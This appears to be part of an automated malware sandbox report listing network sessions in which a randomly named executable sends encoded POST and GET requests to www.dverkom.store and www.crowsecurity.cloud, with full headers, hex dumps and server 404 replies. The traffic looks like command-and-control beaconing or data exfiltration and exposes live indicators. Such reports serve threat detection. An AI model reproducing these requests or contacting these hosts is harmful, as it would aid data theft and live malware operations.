                                                                                          Sep 30, 2024 18:45:24.969862938 CEST485INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 64 65 78 20 2b 3d 20 31 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                          Data Ascii: index += 1 } else { index += 3 } setTimeout(drawFrame, 20) } else if (index != 100) {


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          13192.168.2.54972531.31.196.17801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:45:30.107839108 CEST806OUTPOST /66j2/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.dverkom.store
                                                                                          Origin: http://www.dverkom.store
                                                                                          Referer: http://www.dverkom.store/66j2/
                                                                                          Content-Length: 208
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 4b 72 42 6a 69 41 72 69 54 34 78 67 75 77 36 4a 30 33 6a 59 49 58 66 6e 4d 35 6d 37 4a 35 36 42 50 76 38 4e 41 30 50 41 47 43 65 37 35 4c 4d 61 7a 57 2b 4a 68 43 6e 41 49 66 69 37 54 6f 4e 7a 6c 62 6e 47 62 58 35 71 33 7a 52 59 62 59 65 59 4b 6c 31 54 41 4d 68 67 6a 35 4d 57 76 6e 71 4d 67 50 73 75 7a 47 44 36 79 54 32 58 2b 35 7a 66 41 6a 6f 41 2f 42 37 6e 2b 39 33 76 77 48 6b 6c 64 44 4d 4d 59 53 4e 77 38 57 52 59 70 4f 69 4a 4d 77 4c 37 51 31 6f 32 61 47 48 4e 71 2f 67 72 77 2f 51 47 63 75 38 63 55 41 4b 46 35 43 41 33 72 5a 79 35 51 31 51 56 35 63 7a 69 48 38 4d 73 74 58 46 39 72 6e 55 3d
                                                                                          Data Ascii: gHCXmDU=KrBjiAriT4xguw6J03jYIXfnM5m7J56BPv8NA0PAGCe75LMazW+JhCnAIfi7ToNzlbnGbX5q3zRYbYeYKl1TAMhgj5MWvnqMgPsuzGD6yT2X+5zfAjoA/B7n+93vwHkldDMMYSNw8WRYpOiJMwL7Q1o2aGHNq/grw/QGcu8cUAKF5CA3rZy5Q1QV5cziH8MstXF9rnU=
                                                                                          Sep 30, 2024 18:45:30.783900976 CEST375INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Mon, 30 Sep 2024 16:45:30 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Encoding: gzip
                                                                                          Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          14192.168.2.54972631.31.196.17801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:45:33.269056082 CEST826OUTPOST /66j2/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.dverkom.store
                                                                                          Origin: http://www.dverkom.store
                                                                                          Referer: http://www.dverkom.store/66j2/
                                                                                          Content-Length: 228
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 4b 72 42 6a 69 41 72 69 54 34 78 67 73 52 4b 4a 32 57 6a 59 64 48 66 6b 4a 35 6d 37 41 5a 36 2f 50 76 67 4e 41 31 4c 71 47 77 4b 37 2b 76 45 61 77 53 71 4a 78 53 6e 41 63 76 69 2b 4f 59 4e 38 6c 61 62 4f 62 53 35 71 33 33 42 59 62 64 79 59 4c 55 31 51 53 73 68 69 75 5a 4d 59 72 6e 71 4d 67 50 73 75 7a 43 72 63 79 54 65 58 2f 4b 37 66 41 43 6f 50 79 68 37 6b 39 39 33 76 37 6e 6b 66 64 44 4e 5a 59 58 55 6e 38 55 5a 59 70 4d 36 4a 4d 42 4c 30 4a 6c 6f 77 46 57 47 6e 68 71 4a 30 34 73 73 41 5a 39 46 44 44 42 2b 6d 78 55 74 64 78 37 36 52 44 56 38 74 70 50 37 56 57 4d 74 46 33 30 56 4e 31 77 44 68 6c 43 58 50 54 77 4b 47 41 77 64 66 6c 6a 6f 69 45 39 6f 43
                                                                                          Data Ascii: gHCXmDU=KrBjiAriT4xgsRKJ2WjYdHfkJ5m7AZ6/PvgNA1LqGwK7+vEawSqJxSnAcvi+OYN8labObS5q33BYbdyYLU1QSshiuZMYrnqMgPsuzCrcyTeX/K7fACoPyh7k993v7nkfdDNZYXUn8UZYpM6JMBL0JlowFWGnhqJ04ssAZ9FDDB+mxUtdx76RDV8tpP7VWMtF30VN1wDhlCXPTwKGAwdfljoiE9oC
                                                                                          Sep 30, 2024 18:45:33.928003073 CEST375INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Mon, 30 Sep 2024 16:45:33 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Encoding: gzip
                                                                                          Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          15192.168.2.54972731.31.196.17801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:45:35.819681883 CEST1843OUTPOST /66j2/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.dverkom.store
                                                                                          Origin: http://www.dverkom.store
                                                                                          Referer: http://www.dverkom.store/66j2/
                                                                                          Content-Length: 1244
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 4b 72 42 6a 69 41 72 69 54 34 78 67 73 52 4b 4a 32 57 6a 59 64 48 66 6b 4a 35 6d 37 41 5a 36 2f 50 76 67 4e 41 31 4c 71 47 78 79 37 2b 64 63 61 79 7a 71 4a 6a 43 6e 41 41 2f 69 2f 4f 59 4e 62 6c 62 7a 77 62 53 45 64 33 31 4a 59 61 2f 36 59 4d 67 70 51 5a 73 68 69 78 4a 4d 56 76 6e 71 46 67 50 38 69 7a 47 50 63 79 54 65 58 2f 4c 4c 66 4a 7a 6f 50 30 68 37 6e 2b 39 33 7a 77 48 6c 77 64 44 6b 69 59 54 4a 61 2f 6b 35 59 71 73 71 4a 4b 6e 6e 30 57 31 6f 79 45 57 47 2f 68 71 4e 52 34 73 77 39 5a 38 68 6c 44 47 53 6d 79 46 4d 30 67 71 57 4c 5a 45 42 4c 36 4f 76 75 44 37 4e 33 6f 45 6b 35 76 67 4c 6a 6f 77 44 54 63 33 58 45 4a 69 45 32 7a 79 38 78 4e 4c 42 57 47 4c 74 4b 47 49 66 78 59 33 56 76 6a 37 4c 34 32 4e 55 58 30 71 47 71 67 58 58 42 4c 50 6d 61 6e 54 55 38 69 68 69 4d 39 52 70 48 68 71 6e 4c 5a 50 54 47 44 39 49 70 36 45 73 62 4f 2b 30 34 79 71 57 51 6d 41 76 36 64 57 64 5a 51 48 39 67 41 2b 6e 74 48 70 34 69 42 66 46 52 6d 32 2f 72 63 70 34 58 33 35 31 34 4f 58 69 57 5a 30 [TRUNCATED]
                                                                                          Data Ascii: gHCXmDU=KrBjiAriT4xgsRKJ2WjYdHfkJ5m7AZ6/PvgNA1LqGxy7+dcayzqJjCnAA/i/OYNblbzwbSEd31JYa/6YMgpQZshixJMVvnqFgP8izGPcyTeX/LLfJzoP0h7n+93zwHlwdDkiYTJa/k5YqsqJKnn0W1oyEWG/hqNR4sw9Z8hlDGSmyFM0gqWLZEBL6OvuD7N3oEk5vgLjowDTc3XEJiE2zy8xNLBWGLtKGIfxY3Vvj7L42NUX0qGqgXXBLPmanTU8ihiM9RpHhqnLZPTGD9Ip6EsbO+04yqWQmAv6dWdZQH9gA+ntHp4iBfFRm2/rcp4X3514OXiWZ0H7G5zVOze5hL9b5yOvdrrtBtrRMclwyWXPomugD/7qB4ZJE7m2NGzYXCbigQuMuplA3cE8K8AK99k33++4qtS3F5b8yUyV/5HlrSgfOdSZGdKXlkP6NiLlRUTvaallIb579q6JaHqjV0ZeQElY2Z86Vt5FSyDuZYhnbSDoSBPy9wSVqO2Jv6EBBOOBRjrwXKFyovUnI6HvoAqhKQYb83TtRSFeA2ZKsZC78tVR0l/9QnkCaorroyeBflNo4Gv4RynbMfNoRmsV3ZiI5AI6GIP8uMgej2MucmEFq4FS6at2h6I7p9m14pOpS4+umgmuMbs0DVJCrqFfZK/AFtBqADVGOTI1lY43CXuFMEJTHG83lHlKxgYKc+a/+Dzie6IxDTMNuo0DXa+NF5bl+WWOVsXHp6cdUbgIDMyF/3XPE6rXwxzsLW1UXbL/q2gBcyiXWP4pALlmzX+hGgw7MEthWpE0HDhi+mhC2kbqO9qx1dIfnhvWP07B8kh0Dz2AmSs8h2IK4jsCoDbldmpnRZPbQkbIprIvCTfvdUo1vXsEKQ3v/Qi91rnWnxK5hBnzMeSHF8xeWscul3hVzyXxOuputrn46VwsLTy3IZzk5XvP9DJEepRs3U1ANSLpJrH7jQag0MjbfwV8GWK18/H3/kBDq0omrn8p6Jv59/EH [TRUNCATED]
                                                                                          Sep 30, 2024 18:45:36.499644041 CEST375INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Mon, 30 Sep 2024 16:45:36 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Encoding: gzip
                                                                                          Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          16192.168.2.54972831.31.196.17801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:45:38.367938042 CEST544OUTGET /66j2/?Gh9=g8u8&gHCXmDU=HppDh2G+RtpfmDCT0lrSNXbmIaO8PdTsBI8zXGv7BhGUw+IQzheJ3lftE5yUT4NGt8aZPQR/20xdb9u1HnRpXJ4mqLkzjkiMvvw05xDKhjbhyfyxEkkTngu+5afP1ml7ew== HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Host: www.dverkom.store
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Sep 30, 2024 18:45:39.050970078 CEST733INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Mon, 30 Sep 2024 16:45:38 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                          Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          17192.168.2.5497293.33.130.190801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:45:44.357346058 CEST821OUTPOST /8y34/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.crowsecurity.cloud
                                                                                          Origin: http://www.crowsecurity.cloud
                                                                                          Referer: http://www.crowsecurity.cloud/8y34/
                                                                                          Content-Length: 208
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 61 57 64 4d 69 43 37 4a 4a 32 78 68 42 2f 6f 64 6f 7a 41 4d 34 6b 30 43 30 47 71 41 6f 79 41 37 68 51 4c 6f 5a 49 36 67 43 43 73 36 6b 33 30 4e 35 49 4d 5a 62 30 7a 6d 7a 73 6c 5a 47 4d 72 6c 33 48 54 44 6e 38 70 4a 67 2b 77 31 41 6f 61 52 4d 36 42 5a 43 7a 52 59 4f 73 37 71 78 6c 76 51 63 4b 6e 62 33 43 45 50 61 66 48 50 59 6a 7a 35 73 53 34 39 6c 38 72 36 61 37 39 64 4d 43 47 70 4e 48 6f 43 58 70 55 48 69 35 36 69 4f 4e 31 42 77 74 39 33 4a 6f 35 56 6b 78 51 79 38 31 4b 30 59 49 63 6a 66 41 33 47 42 4f 53 6c 66 51 55 32 68 6f 43 4b 64 31 46 71 73 75 61 2f 6b 63 6c 46 62 33 59 48 77 7a 6f 3d
                                                                                          Data Ascii: gHCXmDU=aWdMiC7JJ2xhB/odozAM4k0C0GqAoyA7hQLoZI6gCCs6k30N5IMZb0zmzslZGMrl3HTDn8pJg+w1AoaRM6BZCzRYOs7qxlvQcKnb3CEPafHPYjz5sS49l8r6a79dMCGpNHoCXpUHi56iON1Bwt93Jo5VkxQy81K0YIcjfA3GBOSlfQU2hoCKd1Fqsua/kclFb3YHwzo=


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          18192.168.2.5497303.33.130.190801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:45:46.897329092 CEST841OUTPOST /8y34/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.crowsecurity.cloud
                                                                                          Origin: http://www.crowsecurity.cloud
                                                                                          Referer: http://www.crowsecurity.cloud/8y34/
                                                                                          Content-Length: 228
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 61 57 64 4d 69 43 37 4a 4a 32 78 68 41 66 30 64 74 51 6f 4d 74 55 30 64 37 6d 71 41 69 53 42 79 68 51 33 6f 5a 4a 2b 77 58 67 34 36 6c 57 45 4e 34 4e 67 5a 4f 30 7a 6d 35 4d 6c 63 49 73 72 2b 33 48 66 4c 6e 35 52 4a 67 2b 30 31 41 73 57 52 4d 4c 42 65 44 6a 52 65 45 38 37 6b 2f 46 76 51 63 4b 6e 62 33 43 51 31 61 66 50 50 5a 54 6a 35 73 77 41 2b 73 63 72 35 64 37 39 64 49 43 47 79 4e 48 6f 67 58 72 67 39 69 36 43 69 4f 4e 46 42 77 35 6f 68 53 59 35 66 37 68 52 34 77 58 48 41 53 59 49 51 53 52 58 43 56 74 57 49 54 47 35 63 37 4b 4b 69 4f 56 70 53 38 39 53 49 31 73 45 73 42 55 49 33 75 6b 2f 62 2f 35 6e 4d 6f 34 33 42 36 62 70 62 62 7a 39 35 5a 33 52 69
                                                                                          Data Ascii: gHCXmDU=aWdMiC7JJ2xhAf0dtQoMtU0d7mqAiSByhQ3oZJ+wXg46lWEN4NgZO0zm5MlcIsr+3HfLn5RJg+01AsWRMLBeDjReE87k/FvQcKnb3CQ1afPPZTj5swA+scr5d79dICGyNHogXrg9i6CiONFBw5ohSY5f7hR4wXHASYIQSRXCVtWITG5c7KKiOVpS89SI1sEsBUI3uk/b/5nMo43B6bpbbz95Z3Ri


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          19192.168.2.5497313.33.130.190801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:45:49.449060917 CEST1858OUTPOST /8y34/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.crowsecurity.cloud
                                                                                          Origin: http://www.crowsecurity.cloud
                                                                                          Referer: http://www.crowsecurity.cloud/8y34/
                                                                                          Content-Length: 1244
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 61 57 64 4d 69 43 37 4a 4a 32 78 68 41 66 30 64 74 51 6f 4d 74 55 30 64 37 6d 71 41 69 53 42 79 68 51 33 6f 5a 4a 2b 77 58 68 41 36 6b 6b 4d 4e 36 71 30 5a 63 45 7a 6d 69 4d 6c 64 49 73 71 73 33 48 48 31 6e 35 73 72 67 38 38 31 43 50 65 52 4f 35 6c 65 4b 6a 52 65 4d 63 37 6c 78 6c 76 2f 63 4b 57 63 33 43 41 31 61 66 50 50 5a 52 72 35 72 69 34 2b 71 63 72 36 61 37 39 52 4d 43 48 64 4e 44 46 64 58 72 6b 58 69 4c 69 69 4f 70 68 42 2f 71 51 68 50 6f 35 5a 34 68 51 74 77 58 4c 66 53 5a 6c 70 53 52 79 76 56 74 65 49 52 68 51 33 72 72 79 67 56 32 6c 30 7a 64 32 6b 67 71 42 56 47 47 51 4e 6a 57 6a 70 33 72 58 77 6b 59 7a 36 34 62 63 4e 4f 33 46 38 61 77 4d 55 54 54 55 6d 77 56 47 48 52 77 6c 53 36 4f 78 75 4e 59 69 30 4f 30 57 7a 77 73 58 77 31 50 31 6c 4a 75 37 71 74 64 66 52 4c 66 71 66 48 4c 2f 72 70 78 53 69 68 32 34 54 56 65 58 47 49 2b 68 4d 55 35 76 46 36 67 36 78 39 30 72 78 2b 35 4a 45 4a 51 74 69 30 6a 30 31 61 58 76 73 72 38 6e 37 6f 32 6a 2b 39 61 36 43 51 70 54 4a 4e 78 [TRUNCATED]
                                                                                          Data Ascii: gHCXmDU=aWdMiC7JJ2xhAf0dtQoMtU0d7mqAiSByhQ3oZJ+wXhA6kkMN6q0ZcEzmiMldIsqs3HH1n5srg881CPeRO5leKjReMc7lxlv/cKWc3CA1afPPZRr5ri4+qcr6a79RMCHdNDFdXrkXiLiiOphB/qQhPo5Z4hQtwXLfSZlpSRyvVteIRhQ3rrygV2l0zd2kgqBVGGQNjWjp3rXwkYz64bcNO3F8awMUTTUmwVGHRwlS6OxuNYi0O0WzwsXw1P1lJu7qtdfRLfqfHL/rpxSih24TVeXGI+hMU5vF6g6x90rx+5JEJQti0j01aXvsr8n7o2j+9a6CQpTJNx7igzVtFBcB1PHVRoRDzITotXfI5Jc3dbrxcIuNTn002FoJZvyvCvYlcEaGSb2PbYOClvO1PjYCMHdDHpdv0pnGZLEo2Jt9gwNUHNDwnIM6NZVRrdjZGgFRqUxkhVTOgGtqUIHH7w+VkpDfWTDP0kpiiR6Z44lu315Tu4p+47JdNHeIeqeeDXaWTc30s9Jg8izkM51Qw39+Zzo58hKvzUME7xZH6TuPUwvbluJeWpPBG3I1giPqigTEc1w38NjE7ge4p4qEkgTUTYQ0CMQmMB0qVs3baiOpL1G/9WDRJXnsvk5HhBvbWEIiRhi7Vup8naVw4k6OBadz/hmdI3FSj1oPuiLGFzm25OCNi/Tsv6UXqwYu83xCjYkHoTGAza6h2VStvE7l4txxbPjY8Yj5cW4waIaddS1QPhI8+NtQ1k+q2OU+uKpeG7dzAmRSG6gTf40Lrqwn1I31W6doEf1FpqNdb9cSUIJu+6urEY2oUd5yLRh/xdO1qozF72bHOzMc+ojYu1mytEzpr6Fvl4T+55kr7jmz0bRPiGPlYoVYaIJh9XW65SmwmBZJzR4OApH+Pfe05iGE5uoNH3insfNC/ycgbZQ9ojPm2WsB+KlHQ78WFDXeSh+GR3aahA4yPGTTkQRMjiS8CMKqVA5If7A4GYatTeVynwno2Ey/ [TRUNCATED]


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          20192.168.2.5497323.33.130.190801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:45:51.993941069 CEST549OUTGET /8y34/?gHCXmDU=XU1sh1XtMideJdcsvQ849SwdzHfbiD52gXGwR5WASyJ1tlInyqc9ITTs981nRcft/RKcq7FVheMXMN6zJo5iI2BJEO7R6UftY8jdwwsPJfysQECRq1QA/MaERKdZHzC5fw==&Gh9=g8u8 HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Host: www.crowsecurity.cloud
                                                                                          Connection: close
